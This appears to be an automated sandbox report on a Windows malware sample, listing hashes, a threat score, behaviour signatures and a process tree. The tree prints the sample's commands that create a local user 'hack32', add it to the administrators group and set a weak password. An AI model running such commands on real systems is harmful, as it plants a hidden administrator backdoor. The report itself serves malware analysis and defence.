Overview

overview

7

Static

static

3

0636ca1a0a...18.exe

windows7-x64

3

0636ca1a0a...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    67s
  • max time network
    54s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/04/2024, 22:31

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe

  • Size

    120KB

  • MD5

    0636ca1a0acb3e040b06234b31ac1d7b

  • SHA1

    48a9a582f86312f5ad41ee4112e765fcdb9c6ce0

  • SHA256

    3d3f357e4ad24e91c3e7bf4d93357b4aba1e31c23829eb1b7f434676de89862e

  • SHA512

    616ef9833e03c5c72e6328b16c7053ed1064adef771e4cf0092c60b8aee27c86a1e7cb3a069dec017e9ba4284ba17b9c9e88acf485c7ed8affaedb27afe84569

  • SSDEEP

    3072:4V3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPdL:Vt5hBPi0BW69hd1MMdxPe9N9uA069TBB

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4756
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3400.tmp\3401.tmp\3402.bat C:\Users\Admin\AppData\Local\Temp\0636ca1a0acb3e040b06234b31ac1d7b_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3716
      • C:\Windows\system32\net.exe
        net user hack32 /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3532
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user hack32 /add
          4⤵
            PID:1548
        • C:\Windows\system32\net.exe
          net localgroup administrateurs hack32 /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4316
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup administrateurs hack32 /add
            4⤵
              PID:3776
          • C:\Windows\system32\net.exe
            net user hack32 abcd
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:620
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 user hack32 abcd
              4⤵
                PID:1204

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\3400.tmp\3401.tmp\3402.bat
                Filesize

                97B

                MD5

                ff8f2a3d62844ae2cbd5fe4e8d0c6a57

                SHA1

                87d5b055c1fb58c4922d40895c9960181255775b

                SHA256

                c9c8d929834a7b24149b93e53c5b3b295580bc7e2866314281e59e91d68e7293

                SHA512

                71fdd1dcd93120a38518b532173728ebd8b98ae2a9856d84301ba61a3f324fae1a8bfbc3ef6713ecb44093aee010b448a69282ca015caba900a6b585cb74d3f0

                Download Submit